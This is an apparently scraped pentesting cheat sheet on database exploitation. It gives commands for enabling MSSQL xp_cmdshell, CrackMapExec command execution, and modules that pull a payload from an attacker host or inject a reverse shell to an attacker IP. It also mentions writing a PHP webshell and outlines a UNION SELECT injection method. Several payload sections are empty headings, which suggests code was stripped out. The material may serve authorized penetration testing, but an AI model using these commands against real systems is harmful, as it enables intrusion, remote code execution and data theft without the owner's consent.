Database Injection & Exploitation

Microsoft SQL

xp_cmdshell

This let's you execute command on the system. Pretty straightforward. You need valid credentials.

python3 /usr/share/doc/python3-impacket/exxamples/mssqlclient.py -windows-auth <domain>/<user>@10.129.95.187
#Check if xp_cmdshell is available
SQL> xp_cmdshell()
#IF NOT
SQL> EXEC sp_configure 'xp_cmdshell', '1'
SQL> RECONFIGURE

CrackMapExec

crackmapexec mssql <target-ip> -u <user> -p <password> -x {cmd}

CrackMapExec - Web Delivery

crackmapexec mssql <target-ip> -u <user> -p <pass> -M web_delivery -o URL=http://<attacker-ip>:8080/dnc.exe

CrackMapExec - Shell injection

crackmapexec mssql <target-ip> -u <user> -p <pass> -M met_inject -o LHOST=<attacker-ip> LPORT=4444

Metasploit mssql_payload

Get a meterpreter.

MySQL

MySQL is one of the most used RDBMS out there and many web applications still suffer from SQL injection attacks. It simply consists in passing arbitrary arguments to a miscoded parsing algorithm.

If user's input is not validated and sanitized before querying the back-end database, this could lead to catastrophic events from data leaks to remote code execution.

Quick PHP WebShell

This writes a shell which takes cmd as variable into /var/www/html/shell.php.

UNION SELECT - Basic example and methodology

1. Find a vulnerable param with quotes/comments

2. Find how many columns in response from query

3. Find how many tables

4. Find how many columns

5. Enumerate rows

6. Profit

NoSQL

A NoSQL database refers to a non-relational database that is short for non SQL and Not only SQL. It is a data-storing and data-retrieving system. NoSQL databases are commonly used nowadays for big Data and IoT devices due to their powerful features such as fast queries, ease of use to developers, scale easily, and flexible data structure.

Modify HTTP request

Payloads

Generic payloads

Generic error based

Generic Time Based SQL Injection Payloads

Generic Union Select

SQL Injection Auth Bypass Payloads